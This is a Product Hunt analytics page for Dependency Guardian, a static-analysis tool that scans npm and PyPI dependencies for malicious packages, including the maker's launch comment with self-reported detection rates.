This product was not featured by Product Hunt yet. It will not yet shown by default on their landing page.
Product upvotes vs the next 3
Waiting for data. Loading
Product comments vs the next 3
Waiting for data. Loading
Product upvote speed vs the next 3
Waiting for data. Loading
Product upvotes and comments
Waiting for data. Loading
Product vs the next 3
Loading
Dependency Guardian
Your dependencies are your biggest attack surface.
Every app today relies on hundreds of open source packages written by strangers. Tools like npm audit and CVE databases only catch known threats (attacks that already happened) When you install a dependency or open a pull request, Dependency Guardian downloads the package tarball and runs behavioral detectors directly against the source code. No CVE lookups. Just static analysis. That means it can catch zero day attacks before they ever reach your production pipeline.
Hey Product Hunt! 👋
I built Dependency Guardian after being affected by the Shai Hulud npm worm attack. It made clear how quietly a compromised dependency can unravel everything you've worked on.
Dependency Guardian runs as a GitHub App or CLI tool and is designed to fit into your existing workflow without friction. There is a free tier and no account required to get started.
We only send your requirements.txt and lockfile (package names and versions) to the server. Your source code never leaves your machine. The API wrapper is open source if you want to audit it yourself.
GitHub Action: https://github.com/WestBayBerry/...
npm package: https://www.npmjs.com/package/@w...
On accuracy: we run every release against 156,000 real packages, both malicious and clean, pulled from public threat intelligence feeds across npm and PyPI. Current results show a 99.19% catch rate on npm and 99.55% on PyPI, with a 99.3% and 99.9% clean pass rate respectively. All detection is static analysis with no LLM inference, meaning results are fully deterministic. Full methodology and limitations are on our benchmark page.
I plan to add support for more languages in the future and have already started working on that.
Would love to hear your feedback.
About Dependency Guardian on Product Hunt
“Your dependencies are your biggest attack surface.”
Dependency Guardian was submitted on Product Hunt and earned 0 upvotes and 2 comments, placing #115 on the daily leaderboard. Every app today relies on hundreds of open source packages written by strangers. Tools like npm audit and CVE databases only catch known threats (attacks that already happened) When you install a dependency or open a pull request, Dependency Guardian downloads the package tarball and runs behavioral detectors directly against the source code. No CVE lookups. Just static analysis. That means it can catch zero day attacks before they ever reach your production pipeline.
On the analytics side, Dependency Guardian competes within Software Engineering, Developer Tools and Security — topics that collectively have 555.9k followers on Product Hunt. The dashboard above tracks how Dependency Guardian performed against the three products that launched closest to it on the same day.
Who hunted Dependency Guardian?
Dependency Guardian was hunted by mckeane mcbrearty. A “hunter” on Product Hunt is the community member who submits a product to the platform — uploading the images, the link, and tagging the makers behind it. Hunters typically write the first comment explaining why a product is worth attention, and their followers are notified the moment they post. Around 79% of featured launches on Product Hunt are self-hunted by their makers, but a well-known hunter still acts as a signal of quality to the rest of the community. See the full all-time top hunters leaderboard to discover who is shaping the Product Hunt ecosystem.
For a complete overview of Dependency Guardian including community comment highlights and product details, visit the product overview.
mckeane mcbrearty